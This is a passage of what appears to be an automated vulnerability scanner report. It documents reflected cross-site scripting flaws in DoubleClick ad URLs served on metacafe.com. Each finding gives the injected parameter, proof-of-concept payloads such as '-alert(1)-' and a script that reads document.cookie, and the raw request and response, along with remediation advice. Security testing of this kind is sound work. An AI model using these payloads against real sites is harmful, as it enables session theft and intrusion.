Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 7537
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 16 May 2011 12:50:51 GMT
Expires: Mon, 16 May 2011 12:50:51 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu May 12 17:46:05 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
JTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-6939975784505313&adurl=be027'-alert(1)-'aa4739289b5http://w.espn.go.com/espnw/?ex_cid=2011_bnnr_espw_mcaf_1axx_nbap \">
...[SNIP]...

3.15. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [ai parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.metacafecom/B5470558.8

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5b114"-alert(1)-"668a0f0874f was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N763.metacafecom/B5470558.8;sz=300x250;pc=[TPAS_ID];click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BEqu0Wx3RTdKPFsqElgem0IXUAaPrkrcCAAAAEAEgADgAWLPuvJcmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ5b114"-alert(1)-"668a0f0874f&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-6939975784505313&adurl=;ord=1792635571? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:50:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7548

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue May 03 11:33:15 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ5b114"-alert(1)-"668a0f0874f&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-6939975784505313&adurl=http://w.espn.go.com/espnw/?ex_cid=2011_bnnr_espw_mcaf_1axx_line ");
var fscUrl = url;
var fscUrlClickTagFound = fal
...[SNIP]...

3.16. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [ai parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.metacafecom/B5470558.8

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload af04c'-alert(1)-'43db30c6c8d was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N763.metacafecom/B5470558.8;sz=300x250;pc=[TPAS_ID];click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BEqu0Wx3RTdKPFsqElgem0IXUAaPrkrcCAAAAEAEgADgAWLPuvJcmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQaf04c'-alert(1)-'43db30c6c8d&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-6939975784505313&adurl=;ord=1792635571? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:50:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7543

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu May 12 17:46:05 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQaf04c'-alert(1)-'43db30c6c8d&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-6939975784505313&adurl=http://w.espn.go.com/espnw/?ex_cid=2011_bnnr_espw_mcaf_1axx_nbap \">
...[SNIP]...

3.17. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [client parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.metacafecom/B5470558.8

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload afef5"-alert(1)-"7664da328bf was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N763.metacafecom/B5470558.8;sz=300x250;pc=[TPAS_ID];click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BEqu0Wx3RTdKPFsqElgem0IXUAaPrkrcCAAAAEAEgADgAWLPuvJcmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-6939975784505313afef5"-alert(1)-"7664da328bf&adurl=;ord=1792635571? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:50:38 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7551

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Apr 28 10:48:35 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-6939975784505313afef5"-alert(1)-"7664da328bf&adurl=http://w.espn.go.com/espnw/?ex_cid=2011_bnnr_espw_mcaf_1bxx_pain");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";
...[SNIP]...

3.18. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [client parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.metacafecom/B5470558.8

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3386a'-alert(1)-'2f70b01d2c3 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N763.metacafecom/B5470558.8;sz=300x250;pc=[TPAS_ID];click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BEqu0Wx3RTdKPFsqElgem0IXUAaPrkrcCAAAAEAEgADgAWLPuvJcmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-69399757845053133386a'-alert(1)-'2f70b01d2c3&adurl=;ord=1792635571? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:50:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7548

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Tue May 03 11:33:15 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-69399757845053133386a'-alert(1)-'2f70b01d2c3&adurl=http://w.espn.go.com/espnw/?ex_cid=2011_bnnr_espw_mcaf_1axx_line \">
...[SNIP]...

3.19. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [num parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.metacafecom/B5470558.8

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 58695"-alert(1)-"7594321f6a2 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N763.metacafecom/B5470558.8;sz=300x250;pc=[TPAS_ID];click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BEqu0Wx3RTdKPFsqElgem0IXUAaPrkrcCAAAAEAEgADgAWLPuvJcmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=058695"-alert(1)-"7594321f6a2&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-6939975784505313&adurl=;ord=1792635571? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:50:22 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7551

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Apr 28 10:48:35 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=058695"-alert(1)-"7594321f6a2&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-6939975784505313&adurl=http://w.espn.go.com/espnw/?ex_cid=2011_bnnr_espw_mcaf_1bxx_pain");
var fscUrl = url;
var fscUrlClickTagFound = false;
va
...[SNIP]...

3.20. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [num parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.metacafecom/B5470558.8

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 64f52'-alert(1)-'352bb153013 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N763.metacafecom/B5470558.8;sz=300x250;pc=[TPAS_ID];click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BEqu0Wx3RTdKPFsqElgem0IXUAaPrkrcCAAAAEAEgADgAWLPuvJcmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=064f52'-alert(1)-'352bb153013&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-6939975784505313&adurl=;ord=1792635571? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:50:26 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7555

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu May 12 18:03:37 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=064f52'-alert(1)-'352bb153013&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-6939975784505313&adurl=http://w.espn.go.com/espnw/?ex_cid=2011_bnnr_espw_mcaf_2bxx_good\">
...[SNIP]...

3.21. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [sig parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.metacafecom/B5470558.8

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8531a'-alert(1)-'f218f4a84b2 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N763.metacafecom/B5470558.8;sz=300x250;pc=[TPAS_ID];click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BEqu0Wx3RTdKPFsqElgem0IXUAaPrkrcCAAAAEAEgADgAWLPuvJcmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg8531a'-alert(1)-'f218f4a84b2&client=ca-pub-6939975784505313&adurl=;ord=1792635571? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:50:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7543

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu May 12 17:46:05 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg8531a'-alert(1)-'f218f4a84b2&client=ca-pub-6939975784505313&adurl=http://w.espn.go.com/espnw/?ex_cid=2011_bnnr_espw_mcaf_1axx_nbap \">
...[SNIP]...

3.22. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [sig parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.metacafecom/B5470558.8

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 47335"-alert(1)-"dcf5d98505f was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N763.metacafecom/B5470558.8;sz=300x250;pc=[TPAS_ID];click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BEqu0Wx3RTdKPFsqElgem0IXUAaPrkrcCAAAAEAEgADgAWLPuvJcmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg47335"-alert(1)-"dcf5d98505f&client=ca-pub-6939975784505313&adurl=;ord=1792635571? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:50:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7543

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu May 12 17:46:05 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg47335"-alert(1)-"dcf5d98505f&client=ca-pub-6939975784505313&adurl=http://w.espn.go.com/espnw/?ex_cid=2011_bnnr_espw_mcaf_1axx_nbap ");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var
...[SNIP]...

3.23. http://ad.doubleclick.net/adj/N763.metacafecom/B5470558.8 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N763.metacafecom/B5470558.8

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d7e4e'-alert(1)-'6d5b409016 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N763.metacafecom/B5470558.8;sz=300x250;pc=[TPAS_ID];click=http://adclick.g.doubleclick.net/aclk?sa=Ld7e4e'-alert(1)-'6d5b409016&ai=BEqu0Wx3RTdKPFsqElgem0IXUAaPrkrcCAAAAEAEgADgAWLPuvJcmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqtyQFFQIjB0euHoXLYknz4rWBkCqdg&client=ca-pub-6939975784505313&adurl=;ord=1792635571? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
